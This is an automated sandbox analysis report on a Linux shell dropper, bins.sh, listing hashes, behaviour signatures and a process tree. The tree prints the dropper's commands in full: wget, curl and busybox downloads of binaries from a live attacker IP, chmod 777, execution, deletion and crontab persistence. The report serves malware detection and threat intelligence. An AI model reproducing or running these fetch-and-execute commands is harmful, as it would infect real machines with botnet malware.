Analysis
-
max time kernel
22s -
max time network
75s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-10-2024 06:53
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
2f7f72afe66995d80b8950bd71167bd4
-
SHA1
289d4e79acdb59a5b7949b7efd0816c5642cad63
-
SHA256
a42b9535d1f64e52d6c1ab42f156b47099ba25c546a8d577c98f459e9b1ae32d
-
SHA512
19333cd2736ae9ba80aae36f468e153cc75c2f02b5e10af97eadc06fe099ff9fde868882ff9617ab6ed27d4d79fea860f73a802781f99907704d74f78e4cc277
-
SSDEEP
96:OXZ90n08OObaPWHgmGVTW8OObazgLmG93TpVVY6/IdNenUd:Op90n08OObaPWHgmGVHOObaXGdVqMnW
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 12 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 711 chmod 767 chmod 794 chmod 801 chmod 817 chmod 832 chmod 838 chmod 683 chmod 742 chmod 787 chmod 810 chmod 844 chmod -
Executes dropped EXE 12 IoCs
Processes:
20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZYOJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9UikCz9tmOI7m7fFqsqyPerBPFauKdpzNM59zO4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvAuATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7IeyrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupGEzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uvu0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8ioc pid process /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY 684 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h 713 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui 743 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z 768 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA 788 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie 795 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK 802 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG 811 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS 818 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv 833 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC 839 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 845 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 -
Renames itself 1 IoCs
Processes:
EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITSpid process 819 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS -
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc process File opened for modification /var/spool/cron/crontabs/tmp.FdDVRh crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Checks CPU configuration 1 TTPs 12 IoCs
Checks CPU information which indicate if the system is a virtual machine.
Processes:
curlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
Processes:
EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITScurlcurlcurlcurlcrontabcrontabcurlcurlcurlcurlcurldescription ioc process File opened for reading /proc/76/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/641/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/26/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/196/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/583/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/836/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/837/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/9/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/19/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/169/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/647/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/16/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/41/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/106/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/269/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/315/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/843/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/4/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/604/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/20/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/842/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/filesystems crontab File opened for reading /proc/filesystems crontab File opened for reading /proc/17/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/24/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/770/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/12/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/28/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/42/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/97/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/18/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/841/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/23/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/824/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/43/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/141/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/599/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/1/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/14/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/25/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/809/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/835/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/15/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/216/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/828/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/13/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/826/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/827/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/self/auxv curl File opened for reading /proc/6/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS File opened for reading /proc/22/cmdline EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS -
Writes file to tmp directory 30 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetbusyboxbusyboxwgetcurlbusyboxbusyboxbusyboxwgetwgetbusyboxwgetcurlcurlwgetbusyboxcurlcurlcurlbusyboxwgetcurlcurlbusyboxbusyboxcurlbusyboxbusyboxdescription ioc process File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie wget File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG wget File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS wget File opened for modification /tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC busybox File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY busybox File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui wget File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK curl File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS busybox File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK busybox File opened for modification /tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8 busybox File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY wget File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h wget File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h busybox File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z wget File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z curl File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui curl File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA wget File opened for modification /tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv busybox File opened for modification /tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h curl File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie curl File opened for modification /tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY curl File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG busybox File opened for modification /tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK wget File opened for modification /tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG curl File opened for modification /tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS curl File opened for modification /tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui busybox File opened for modification /tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z busybox File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA curl File opened for modification /tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA busybox File opened for modification /tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:649
-
/bin/rm/bin/rm bins.sh2⤵PID:651
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:653
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:676
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Writes file to tmp directory
PID:682
-
-
/bin/chmodchmod 777 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- File and Directory Permissions Modification
PID:683
-
-
/tmp/20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY./20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵
- Executes dropped EXE
PID:684
-
-
/bin/rmrm 20ki4GMKxEhxoLqQjxIhaeLj0CKB8DlNZY2⤵PID:686
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:687
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:694
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Writes file to tmp directory
PID:706
-
-
/bin/chmodchmod 777 OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- File and Directory Permissions Modification
PID:711
-
-
/tmp/OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h./OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵
- Executes dropped EXE
PID:713
-
-
/bin/rmrm OJjaAwTNBxpz3pf9X84YoKcedDD5OxtV4h2⤵PID:715
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Writes file to tmp directory
PID:739
-
-
/bin/chmodchmod 777 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- File and Directory Permissions Modification
PID:742
-
-
/tmp/4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui./4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵
- Executes dropped EXE
PID:743
-
-
/bin/rmrm 4AcXmxvNSw3AalqTPFwXBm16AC0eXQT9Ui2⤵PID:745
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:746
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Writes file to tmp directory
PID:762
-
-
/bin/chmodchmod 777 kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z./kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm kCz9tmOI7m7fFqsqyPerBPFauKdpzNM59z2⤵PID:772
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:785
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Writes file to tmp directory
PID:786
-
-
/bin/chmodchmod 777 O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA./O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm O4XrOGB0PWNhMRJWYb3eh74OtbbyiLRzvA2⤵PID:790
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:791
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:792
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Writes file to tmp directory
PID:793
-
-
/bin/chmodchmod 777 uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- File and Directory Permissions Modification
PID:794
-
-
/tmp/uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie./uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵
- Executes dropped EXE
PID:795
-
-
/bin/rmrm uATf0dUEXLacqsrzxgpSm5eSrv1Ao9Z7Ie2⤵PID:797
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:798
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Checks CPU configuration
- Writes file to tmp directory
PID:799
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Writes file to tmp directory
PID:800
-
-
/bin/chmodchmod 777 yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- File and Directory Permissions Modification
PID:801
-
-
/tmp/yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK./yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵
- Executes dropped EXE
PID:802
-
-
/bin/rmrm yrI5r9AckmvAtKQGkBWSb9ej7DzTaH5MjK2⤵PID:804
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:805
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:806
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Writes file to tmp directory
PID:807
-
-
/bin/chmodchmod 777 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- File and Directory Permissions Modification
PID:810
-
-
/tmp/3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG./3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵
- Executes dropped EXE
PID:811
-
-
/bin/rmrm 3Q5OOatNbvGEfLoIjieulgKr4hlUw9YupG2⤵PID:813
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:814
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:815
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Writes file to tmp directory
PID:816
-
-
/bin/chmodchmod 777 EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- File and Directory Permissions Modification
PID:817
-
-
/tmp/EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS./EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:818 -
/bin/shsh -c "crontab -l"3⤵PID:820
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:821
-
-
-
/bin/shsh -c "crontab -"3⤵PID:822
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
- Reads runtime system information
PID:823
-
-
-
-
/bin/rmrm EzgMRtgZ1YoyAmXEdKr7jLNppPO21hbITS2⤵PID:825
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Checks CPU configuration
PID:830
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Writes file to tmp directory
PID:831
-
-
/bin/chmodchmod 777 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- File and Directory Permissions Modification
PID:832
-
-
/tmp/4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv./4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵
- Executes dropped EXE
PID:833
-
-
/bin/rmrm 4i5A6cAmigaXKnu1hsWvCQ4LebK5gR98uv2⤵PID:834
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:835
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Checks CPU configuration
- Reads runtime system information
PID:836
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Writes file to tmp directory
PID:837
-
-
/bin/chmodchmod 777 u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- File and Directory Permissions Modification
PID:838
-
-
/tmp/u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC./u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵
- Executes dropped EXE
PID:839
-
-
/bin/rmrm u0bp4qcR8XFdn4fZU7E5HTezTG7PdNnwZC2⤵PID:840
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:841
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Checks CPU configuration
- Reads runtime system information
PID:842
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Writes file to tmp directory
PID:843
-
-
/bin/chmodchmod 777 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- File and Directory Permissions Modification
PID:844
-
-
/tmp/2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs8./2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm 2Zr85SzHrHIZpJirZ4bPMTODUUZZuuNQs82⤵PID:846
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/HDjjT3VZRkPBsxVNj4oqaJKkID6MviW6qF2⤵PID:847
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
129KB
MD554bec959d900ad930dc662f8092da57d
SHA19ae7ad9018eeac5aa89bcde68ec683a364ac7d55
SHA256b62a7cb65dda1cb1ae995b13b62d20289f43b7bc560211484cfdc98c0d9b5f12
SHA512904a52a1d41d442da07333f9835bb0b1bfcefe9790a566d3b8e03d62e0c788d10b0e17b05865798b1817615b3adb07adfcb13452d96aacf5995b66fae617db40
-
Filesize
108KB
MD5c97a9c55ddb153e8bfce38f201d2cffb
SHA13970452f27327f98c2e3fdcabf0390067b48bd62
SHA256138a80e023ab0bbb8b2259cf3633c94c39e6f68df2be2ad01ef08590249e662c
SHA5121734a2e256f90d99d73c70d0faa5b3d24d39a2e9a60dec0c138e75ae0e1793edafb408e1f2aaa2692f40265183faea1d4141b271fb67543633a412817f9fd11e
-
Filesize
129KB
MD552f72bcf31899453b40d37a7cbf55f35
SHA16dfca1bd70aad3e88713b02ec1669ba5a792456c
SHA256ed7e61403d47c0319eea05db0cba4d17bfb1594621d6722bfe43cffecacdf495
SHA512be8b5d14afe30f1ce2f474a20af599a93c3a7543ec301554dd2ffa0225c945d91c3354d777f09ee886a90acfa8ecfa24533de9cf3bcf5f59a44d53ca3c73e967
-
Filesize
88KB
MD5e9e5d79acad49bbe6c77df0385ec77aa
SHA153bbc8b58873cf3117743fab15bd5508421370eb
SHA256a585eff62bec554d3d7f23aaf9b298a15eb328e8968352339db915ef427f27bd
SHA512828680ef393890f3c8805527a473f018b212fa1d6c8534fc03bb34f910de4b8d1cd5ce3cef2c06396f225a61794205a61d9fdc6847b14ebd6d7267af9f38f381
-
Filesize
122KB
MD5aadb8cc4b6eac7fce760c09262693884
SHA1b55178ff3605f4bbfc9286d4c8ac445673232217
SHA256b254f9a6df1e7aae5181abf014b9d574c959ab71bdfd3a2b21022446c583d843
SHA5125567998215fc9389efeb34ee57e59db4141044bbb1f06cac365565681226836b515c8c8cc17931e72e71d4240a5f433aebb8dfe67b2463ef800f59c86561a62c
-
Filesize
158KB
MD5d8e96e2fdd3c610ec19128e18de5abde
SHA110cf691ae9779bfeca8b67e75721d0a6f275e4f9
SHA256f09f8db2883da603f963189ef3b8185b179832de8b2e526ef63fe8b96847cc7b
SHA512979e0f29d7b65fcf7c4d93ec6fdaa70cdd26d9fa8a526fee7d4cdb028229db06186f89c9b0c93d3112e636c1b65819d46695310c90a1700343c2221df9323592
-
Filesize
95KB
MD5c20c610e14b8e59f5f8258a55fe7f27d
SHA1e59a0b83d9882f2770f052a213cad25b0cbd53fc
SHA256adb7828df990cedc9f301891e725c547656967d827ce9cfdf3f6e8fa8242618b
SHA512dd8d992edcb5e4dae5e97a1ad12c28560a2cda02dcc1867250de78b0fe0d0f511b7269cb4999c80d6d299b87145bcef5b1587730b496426f14550b6f7a0a59a2
-
Filesize
93KB
MD58fad5e89ce3d2b6159ac2ce2fdf7c084
SHA127105a304b9bb7cd8a663d1b4da1d92fd8eea355
SHA25624689f385c263c42a28dd1498049171abc633faf91b5df2a738a81145d929bd6
SHA51271689ade77c0ad2ca2db18ed4fd437b6a053b002efadbf6fb479e4f5c85a7830dc0e9cbfef877ca7a91c735a68f28226e7c813c05b329c23668de7edbc99f4bc
-
Filesize
101KB
MD58d0f8d45165dc1f3ba334ce75be39621
SHA11d5baece9d5af3885276735c3c20d28e161e00ff
SHA25617441ed8bf165953a69907fb286dd47f2de3f94b744da25c889f86514b904791
SHA512a8b032ce95f8a70b8c8c0b60b711d379706938c571bcb5cfd7fd16dac64c7d005987169abfd5d0d53b2e1da14eb1bd24cf913c7202f5855a9e4f0d80ce86f5e7
-
Filesize
100KB
MD53b78bb645b81d600c30713d416f666be
